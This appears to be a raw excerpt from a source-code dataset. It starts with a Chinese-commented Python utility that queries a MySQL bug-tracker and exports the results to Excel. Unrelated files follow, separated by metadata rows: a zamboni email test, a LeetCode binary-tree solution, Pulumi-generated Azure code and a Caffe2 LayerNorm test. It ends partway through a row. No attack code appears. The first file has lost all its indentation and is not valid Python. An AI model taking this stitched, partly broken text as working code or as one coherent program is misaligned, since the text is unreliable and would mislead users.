# print(sql_return_result_tuple)
return sql_return_result_tuple
# 功能:执行一条sql语句,并返回表头数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnth(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.description
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# print('返回数据如下:')
# print(sql_return_result_tuple)
return sql_return_result_tuple
# 功能:执行一条sql语句,返回json数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnjson(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
data = {}
jsondatas = [] # data:{jsondatas}
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple)
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = jsondatas
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('<dbutil.py> (execute_onesql_returnjson) 返回jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句,返回json数据.里面sqlresultcode =
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnjson_privilege(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
data = {}
jsondatas = [] # data:{jsondatas}
privilege_int = 0
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
print("获取权限,执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("获取权限执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("获取权限执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("获取权限sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple)
privilege_int = sql_return_result_tuple[0]
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = jsondatas
data['privilege_int'] = privilege_int
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('<dbutil.py> (execute_onesql_returnjson) 返回jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句,返回int数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returnint(sql, *args):
# 初始化数据
result_int = 0 # sql语句执行结果
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
result_int = sql_return_result_tuple[0] # 成功
# print('获取权限,typesql_return_result_tuple ========================', sql_return_result_tuple)
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
return result_int
# 功能:执行一条sql语句,返回tuple数据
# 1. sql 2. 参数后面的匹配变量
def execute_onesql_returntuple(sql, *args):
# 初始化数据
result_int = 0 # sql语句执行结果
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 5.返回json格式的数据
return sql_return_result_tuple
# 写入excel文件
"""
功能:写入excel文件
参数:path : excel文件的输出路径,结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def wirte2excelfile(excelrelpath):
"""
# xlwt方式创建workbook
# 创建sheet
# sheet中写入数据
# 保存excel
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet(u'Sheet1', cell_overwrite_ok=True)
sheet1.write(0, 0, 'haha')
book.save('D:\\test1.xls') # 需要写2个\\ xlsx 不支持xlsx格式文件
"""
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel文件绝对路径", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
# book = xlsxwriter.Workbook("D:\\test1.xlsx") # 必须使用双\\ 否则报参数错误
# 创建sheet
sheet1 = book.add_worksheet("Sheet1")
# sheet中写入数据
sheet1.write(0, 0, "ssss")
sheet1.write(0, 1, "ssss")
sheet1.write(0, 2, "ssss")
# 关闭workbook
book.close()
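# 用法示例(仅作说明,非原有代码;示例文件名为假设):
# wirte2excelfile('excel_upload/demo.xlsx')  # 相对项目根目录 rootdir,上级目录需已存在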
# 写入excel文件
"""
功能:写入excel文件
参数:1. excelrelpath : excel文件的输出路径(相对根目录的路径,路径前不用加\\),结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
      3. ifwrite_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def write2excelfile_returnjson_onesheet(excelrelpath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 2. 执行sql语句,获取返回值
# sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from bugcount.buglist'
thtuples = execute_onesql_returnth(searchsql)
print("====================thtuple=", thtuples)
tdtuples = execute_onesql(searchsql)
print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
sheet1 = book.add_worksheet("Sheet1") # 写入哪个Sheet
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheet1.write(0, th, thtuples[th][0])
sheet1.write(0, th, tableheaddict[thtuples[th][0]])
# 写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None or tdtuples[row - 1][col] == '': # 表格内容是None,替换成空字符串
sheet1.write(row, col, '')
else:
# 转换日期格式 ‘提交日期’列数从0开始
if col == 0:
# 不为空的话,转成YYYY-MM-DD这种格式的,
# sheet1.write(row, col, datetime.strptime(tdtuples[row - 1][col], '%Y-%m-%d').date().strftime("%Y/%m/%d")) # 导出前已经是日期格式,这样写法错误
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
# sheet1.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheet1.write(row, col, datetime.strftime(tdtuples[row - 1][col], "%Y/%#m/%#d")) # 转成日期格式str
# 将 ‘关闭情况’int--> 文字
elif col == 8: # 第9列是 ‘关闭情况’
# print('tdtuples[row - 1][col]type======================', type(tdtuples[row - 1][col])) # int
# print('tdtuples[row - 1][col]======================', tdtuples[row - 1][col])
if tdtuples[row - 1][col] == 1:
# tdtuples[row - 1][col] = '处理' # 因为tuple 不能复制,所以这种写法错误,报错TypeError: 'tuple' object does not support item assignment
sheet1.write(row, col, '处理')
elif tdtuples[row - 1][col] == 2:
sheet1.write(row, col, '关闭')
elif tdtuples[row - 1][col] == 3:
sheet1.write(row, col, '回归')
elif tdtuples[row - 1][col] == 4:
sheet1.write(row, col, '延迟')
elif tdtuples[row - 1][col] == 5:
sheet1.write(row, col, '重开')
else:
sheet1.write(row, col, '未知')
elif col == 9: # 关闭时间
# 不为空
# print("?????????????当前值", tdtuples[row - 1][col])
# print("?????????????当前值type", type(tdtuples[row - 1][col]))
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheet1.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
else:
sheet1.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
    # 4. 重置json数据,顺序执行完就算成功
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
"""
功能:写入excel文件
参数:1. excelrelpath : excel文件的输出路径(相对根目录的路径,路径前不用加\\),结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
      3. ifwrite_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def write2excelfile_returnjson_nsheet(excelrelpath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
get_project_sql = "select project from bugcount.buglist where project is not null and project != '' group by project"
projects = execute_onesql_returntuple(get_project_sql)
print("???????项目==", projects)
# 2. 执行sql语句,获取返回值
sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, ' \
'bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, ' \
'intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex ' \
'from bugcount.buglist '
thtuples = execute_onesql_returnth(sql)
print("====================thtuple=", thtuples)
# tdtuples = execute_onesql(searchsql)
# print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
# 返回的这种格式的 (('1808',), ('C8 3+4G',), ('FH03',), ('JC二期',), ('K项目',), ('K项目-多仓库',), ('K项目-马来',), ('K项目-鹰潭',), ('LJG',), ('WRJ',), ('ZG',), ('大S北向审计日志系统',), ('大S项目',), ('视频问题',))
for i in projects:
# print("!!!!!!!!项目==", i)
index = projects.index(i)
print("!!!!!!!!项目type==", i[0])
print("!!!!!!!!项目type==", type(i[0]))
# lsxwriter.exceptions.InvalidWorksheetName: Invalid Excel character '[]:*?/\' in sheetname 'K项目/K项目-多仓库'.
# excel不支持sheet里写入带/的
sheetN = book.add_worksheet(str(i[0]).replace('/', '-'))
# 1. 每个表写入表头
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheetN.write(0, th, thtuples[th][0])
sheetN.write(0, th, tableheaddict[thtuples[th][0]])
# 2. 获取表数据
tdtuples = execute_onesql(searchsql, i[0])
# 3.写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None or tdtuples[row - 1][col] == '': # 表格内容是None,替换成空字符串
sheetN.write(row, col, '')
else:
# 转换日期格式 ‘提交日期’列数从0开始
if col == 0:
# 不为空的话,转成YYYY-MM-DD这种格式的,
# sheetN.write(row, col, datetime.strptime(tdtuples[row - 1][col], '%Y-%m-%d').date().strftime("%Y/%m/%d")) # 导出前已经是日期格式,这样写法错误
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
# sheetN.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheetN.write(row, col, datetime.strftime(tdtuples[row - 1][col], "%Y/%#m/%#d")) # 转成日期格式str
# 将 ‘关闭情况’int--> 文字
elif col == 8: # 第9列是 ‘关闭情况’
# print('tdtuples[row - 1][col]type======================', type(tdtuples[row - 1][col])) # int
# print('tdtuples[row - 1][col]======================', tdtuples[row - 1][col])
if tdtuples[row - 1][col] == 1:
# tdtuples[row - 1][col] = '处理' # 因为tuple 不能复制,所以这种写法错误,报错TypeError: 'tuple' object does not support item assignment
sheetN.write(row, col, '处理')
elif tdtuples[row - 1][col] == 2:
sheetN.write(row, col, '关闭')
elif tdtuples[row - 1][col] == 3:
sheetN.write(row, col, '回归')
elif tdtuples[row - 1][col] == 4:
sheetN.write(row, col, '延迟')
elif tdtuples[row - 1][col] == 5:
sheetN.write(row, col, '重开')
else:
sheetN.write(row, col, '未知')
elif col == 9: # 关闭时间
# 不为空
# print("?????????????当前值", tdtuples[row - 1][col])
# print("?????????????当前值type", type(tdtuples[row - 1][col]))
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheetN.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
else:
sheetN.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
    # 4. 重置json数据,顺序执行完就算成功
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 另存为到用户自定义文件,并写入excel文件
"""
功能:写入excel文件
参数:1. excelabspath : excel文件的输出绝对路径,结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
      3. ifwrite_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def wirte2excelfile_storage_returnjson(excelabspath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 2. 执行sql语句,获取返回值
# sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from bugcount.buglist'
thtuples = execute_onesql_returnth(searchsql)
print("====================thtuple=", thtuples)
tdtuples = execute_onesql(searchsql)
# print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
sheet1 = book.add_worksheet("Sheet1") # 写入哪个sheet
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheet1.write(0, th, thtuples[th][0])
sheet1.write(0, th, tableheaddict[thtuples[th][0]])
# 写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None: # 表格内容是None,替换成空字符串
sheet1.write(row, col, '')
else:
sheet1.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
    # 4. 重置json数据,顺序执行完就算成功
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
| 35.567143 | 539 | 0.556111 |
fe5fcb4f14ca4883aa4b03eabff24efa4c3fa0e1 | 1,501 | py | Python | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | import uuid
from django.core import mail
from mock import patch
from nose.tools import eq_, ok_
import mkt
from mkt.purchase import tasks as tasks
from mkt.purchase.models import Contribution
from mkt.purchase.tests.utils import PurchaseTest
class TestReceiptEmail(PurchaseTest):
def setUp(self):
super(TestReceiptEmail, self).setUp()
self.contrib = Contribution.objects.create(addon_id=self.addon.id,
amount=self.price.price,
uuid=str(uuid.uuid4()),
type=mkt.CONTRIB_PURCHASE,
user=self.user,
source_locale='en-us')
def test_send(self):
tasks.send_purchase_receipt(self.contrib.pk)
eq_(len(mail.outbox), 1)
@patch('mkt.purchase.tasks.send_html_mail_jinja')
def test_data(self, send_mail_jinja):
with self.settings(SITE_URL='http://f.com'):
tasks.send_purchase_receipt(self.contrib.pk)
args = send_mail_jinja.call_args
data = args[0][3]
eq_(args[1]['recipient_list'], [self.user.email])
eq_(data['app_name'], self.addon.name)
eq_(data['developer_name'], self.addon.current_version.developer_name)
eq_(data['price'], self.contrib.get_amount_locale('en_US'))
ok_(data['purchases_url'].startswith('http://f.com'))
| 34.906977 | 78 | 0.584943 |
d9a3c0253584a9a81361095d2d12d85951e67b05 | 1,444 | py | Python | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve-Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | 1 | 2021-05-03T21:48:25.000Z | 2021-05-03T21:48:25.000Z | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def buildTree(self, preorder, inorder):
# Create an index to map values to their index in the inorder array.
index_map = {val:index for index, val in enumerate(inorder) }
# Global variable keeping track of preorder index
self.pre_index = 0
return self.recurseBuild(index_map, preorder, inorder, 0, len(inorder))
def recurseBuild(self, index_map, preorder, inorder, start, end):
# A branch end is detected when the starting index of an array is bigger than end index
if start >= end:
return None
# split is the index in inorder which has the same value as the current root in preorder
split = index_map[preorder[self.pre_index]]
self.pre_index +=1
# Create current node
cur = TreeNode(preorder[self.pre_index-1])
# Iterate with new start and end limits based on index of next preorder
cur.left = self.recurseBuild(index_map, preorder, inorder, start, split)
cur.right = self.recurseBuild(index_map, preorder, inorder, split+1, end)
return cur
z = Solution()
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
a = (z.buildTree(preorder, inorder))
#print(z.printTree(a))
| 32.088889 | 103 | 0.641274 |
5ea07fb5351baf806b91e0658279c31ba801cd18 | 2,583 | py | Python | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'ListTopicSharedAccessKeysResult',
'AwaitableListTopicSharedAccessKeysResult',
'list_topic_shared_access_keys',
]
@pulumi.output_type
class ListTopicSharedAccessKeysResult:
"""
Shared access keys of the Topic
"""
def __init__(__self__, key1=None, key2=None):
if key1 and not isinstance(key1, str):
raise TypeError("Expected argument 'key1' to be a str")
pulumi.set(__self__, "key1", key1)
if key2 and not isinstance(key2, str):
raise TypeError("Expected argument 'key2' to be a str")
pulumi.set(__self__, "key2", key2)
@property
@pulumi.getter
def key1(self) -> Optional[str]:
"""
Shared access key1 for the topic.
"""
return pulumi.get(self, "key1")
@property
@pulumi.getter
def key2(self) -> Optional[str]:
"""
Shared access key2 for the topic.
"""
return pulumi.get(self, "key2")
class AwaitableListTopicSharedAccessKeysResult(ListTopicSharedAccessKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListTopicSharedAccessKeysResult(
key1=self.key1,
key2=self.key2)
def list_topic_shared_access_keys(resource_group_name: Optional[str] = None,
topic_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListTopicSharedAccessKeysResult:
"""
Shared access keys of the Topic
:param str resource_group_name: The name of the resource group within the user's subscription.
:param str topic_name: Name of the topic.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['topicName'] = topic_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:eventgrid/v20200401preview:listTopicSharedAccessKeys', __args__, opts=opts, typ=ListTopicSharedAccessKeysResult).value
return AwaitableListTopicSharedAccessKeysResult(
key1=__ret__.key1,
key2=__ret__.key2)
| 32.696203 | 168 | 0.665892 |
abe6646d78e5b582d922bc0bb0a1584ee3536d43 | 4,361 | py | Python | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 40 | 2021-06-01T07:37:59.000Z | 2022-03-25T01:42:09.000Z | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 14 | 2021-06-01T11:52:46.000Z | 2022-03-25T02:13:08.000Z | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 7 | 2021-07-20T19:34:26.000Z | 2022-03-13T21:07:36.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import caffe2.python.fakelowp.init_shared_libs # noqa
from caffe2.proto import caffe2_pb2
from caffe2.python import core
from caffe2.python import workspace
from caffe2.python.onnx.onnxifi import onnxifi_caffe2_net
from caffe2.python.fakelowp.test_utils import print_test_debug_info
from hypothesis import given, settings
from hypothesis import strategies as st
import caffe2.python.serialized_test.serialized_test_util as serial
core.GlobalInit(["caffe2",
"--glow_global_fp16=1",
"--glow_global_fused_scale_offset_fp16=1",
"--glow_global_force_sls_fp16_accum=1"])
GLOW_LOWERED_BATCHNORM = False
# Test the lowered LayerNorm op
class LayerNorm(serial.SerializedTestCase):
@given(seed=st.integers(0, 65535),
batch_size=st.integers(min_value=1, max_value=50),
size=st.integers(min_value=2, max_value=128),
epsilon=st.floats(min_value=1e-4, max_value=1e-3),
elementwise_affine=st.booleans())
@settings(max_examples=100, deadline=None)
def Skip_test_layernorm(self, seed, batch_size, size, epsilon, elementwise_affine):
np.random.seed(seed)
# Reset the workspace
workspace.ResetWorkspace()
axis = 1
dims = np.array(([batch_size, size]))
X = np.random.uniform(size=dims).astype(np.float32) - 0.5
gamma = np.random.randn(*X.shape[axis:]).astype(np.float32)
beta = np.random.randn(*X.shape[axis:]).astype(np.float32)
pred_net = caffe2_pb2.NetDef()
pred_net.name = "pred"
pred_net.external_input.extend(["X", "gamma", "beta"])
pred_net.external_output.extend(["Y", "mean", "rstd"])
pred_net.op.add().CopyFrom(
core.CreateOperator(
"LayerNorm",
["X", "gamma", "beta"] if elementwise_affine else ["X"],
["Y", "mean", "rstd"],
axis=axis,
epsilon=epsilon,
elementwise_affine=elementwise_affine
)
)
pred_net_ref = caffe2_pb2.NetDef()
pred_net_ref.name = "pred_ref"
pred_net_ref.external_input.extend(["X", "gamma", "beta"])
pred_net_ref.external_output.extend(["Y", "mean", "rstd"])
pred_net_ref.op.add().CopyFrom(
core.CreateOperator(
"LayerNormFakeFP16NNPI",
["X", "gamma", "beta"] if elementwise_affine else ["X"],
["Y", "mean", "rstd"],
axis=axis,
epsilon=epsilon,
elementwise_affine=elementwise_affine
)
)
shape_hits = {"X": X.shape, "gamma": gamma.shape, "beta": beta.shape}
pred_net_onnxified = onnxifi_caffe2_net(
pred_net,
shape_hits,
debug=True,
adjust_batch=True,
use_onnx=False
)
num_onnxified_ops = sum(
1 if o.type == "Onnxifi" else 0 for o in pred_net_onnxified.op)
np.testing.assert_equal(num_onnxified_ops, 1)
workspace.FeedBlob("X", X)
workspace.FeedBlob("gamma", gamma)
workspace.FeedBlob("beta", beta)
workspace.CreateNet(pred_net_ref)
workspace.CreateNet(pred_net_onnxified)
workspace.RunNet(pred_net_ref.name)
Y_c2 = workspace.FetchBlob("Y")
dims1 = np.array(([1, *dims]))
X_glow = X.reshape(dims1)
workspace.FeedBlob("X", X_glow)
workspace.RunNet(pred_net_onnxified.name)
Y_glow = workspace.FetchBlob("Y")
if not np.allclose(Y_glow, Y_c2):
diff_Y = np.abs(Y_glow - Y_c2)
print_test_debug_info(
"layernorm",
{
"seed": seed,
"size": size,
"batch_size": batch_size,
"epsilon": epsilon,
"gamma": gamma,
"beta": beta,
"elementwise_affine": elementwise_affine,
"X": X,
"Y_glow": Y_glow,
"Y_c2": Y_c2,
"diff_Y": diff_Y,
}
)
assert(0)
| 35.455285 | 87 | 0.58404 |
bf7b8b2b0506ebf5758d2eda199b1395e39e6165 | 308 | py | Python | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
